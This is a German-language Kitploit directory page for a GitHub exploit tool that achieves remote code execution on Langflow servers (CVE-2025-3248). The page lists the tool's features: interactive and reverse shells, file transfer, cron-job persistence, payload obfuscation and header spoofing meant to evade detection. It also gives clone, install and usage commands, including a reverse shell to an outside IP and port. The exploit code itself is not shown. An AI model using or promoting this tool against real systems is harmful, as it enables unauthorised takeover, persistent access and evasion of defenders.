Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
langflow-rce-exploit — Exploit für Remote-Code-Ausführung für Langflow (CVE-2025-3248) - [ Von S4Tech ] | Kitploit
Tools/GitHubGitHub/0-d3y/langflow-rce-exploit
Privilege EscalationPersistenzmechanismenSchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed TeamingRemote-Access-ToolPayload-Entwicklung
715vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
0-d3y/langflow-rce-exploit

langflow-rce-exploit

Exploit für Remote-Code-Ausführung für Langflow (CVE-2025-3248) - [ Von S4Tech ]

Repository anzeigen

Langflow RCE Exploit (CVE-2025-3248)

Python Version License Platform

Exploit zur Remote-Code-Ausführung für Langflow (CVE-2025-3248)

Funktionen

  • Automatische Schwachstellenerkennung
  • Mehrere Ausnutzungsmodi:
    • Interaktive Shell
    • Einzelbefehlsausführung
    • Reverse-Shell-Verbindung
  • Datei-Upload-Funktion
  • Farbige Benutzeroberfläche
  • Mehrere Reverse-Shell-Methoden
  • Persistenz des Befehlsverlaufs

📌 Änderungsprotokoll (v2.0)

✨ Neue Funktionen:

  • Erweitertes Payload-System mit 5 Ausführungsmethoden
  • Datei-Upload/-Download mit Base64-Kodierung
  • Persistenz über Cron-Jobs (persist-Befehl)
  • Interaktive Shell-Upgrades:
    • upload local_path remote_path
    • download remote_path local_path
    • clear-Befehl für das Terminal

🛡️ Sicherheitsverbesserungen:

  • Automatische Payload-Verschleierung (Base64 + zufällige Varianten)
  • Header-Rotation pro Anfrage:
    • Zufälliger User-Agent
    • Gefälschte X-Forwarded-For-IPs
  • HTTPS-Bypass (Unterstützung für selbstsignierte Zertifikate)
  • Keine Weiterleitungen, um Erkennung zu vermeiden

⚡ Technische Verbesserungen:

  • Mehrstufige Schwachstellenverifikation
  • Verbesserte Fehlerbehandlung für instabile Verbindungen
  • Vollständige Sitzungsprotokollierung in exploit_log.txt
  • Persistenz des Befehlsverlaufs (.langflow_shell_history)

📊 Versionsvergleich:

🐛 Fehlerbehebungen:

  • Behobene HTTPS-Verbindungsprobleme
  • Verbesserte Handhabung von Sonderzeichen in Befehlen
  • Stabilisierte Reverse-Shell-Zuverlässigkeit

Anforderungen

  • Python 3.6 oder neuer
  • Erforderliche Bibliotheken:
    • requests
    • colorama
    • readline

Installation

root@kitploit:~
git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt

Verwendung

root@kitploit:~
python exploit.py <URL> [Optionen]

Verfügbare Optionen:

Beispiele:

  1. Schwachstelle prüfen:
root@kitploit:~
python exploit.py http://target.com
  1. Interaktive Shell starten:
root@kitploit:~
python exploit.py http://target.com --shell
  1. Einzelnen Befehl ausführen:
root@kitploit:~
python exploit.py http://target.com --command "whoami"
  1. Reverse-Shell starten:
root@kitploit:~
python exploit.py http://target.com --reverse 192.168.1.100 4444

Screenshots

Image.png)

Warnung

âڑ ï¸ڈ Dieses Tool ist ausschließlich für Bildungs- und autorisierte Testzwecke bestimmt.
âڑ ï¸ڈ Nicht autorisierte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben, ist illegal.

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe Datei LICENSE für Details.

Autor

  • Mr.SaMi
    Twitter
    Instagram

Mitwirken

Pull-Requests sind willkommen. Bei größeren Änderungen eröffnen Sie bitte zuerst ein Issue, um zu besprechen, was Sie ändern möchten.

Tool herunterladen
Featurev1.0v2.0
Payload-Methoden15
Dateiübertragung❌ Nicht unterstützt✅ Unterstützt
Persistenz❌✅
TarnungsstufeBasisErweitert
Sitzungsprotokollierung❌✅
OptionBeschreibung
--shellInteraktive Shell starten
--reverse IP PORTReverse-Shell zur angegebenen IP:PORT starten
--command CMDEinzelnen Befehl ausführen
--verboseAusführliche Ausgabe aktivieren
--timeout SECAnforderungs-Timeout festlegen (Standard: 10s)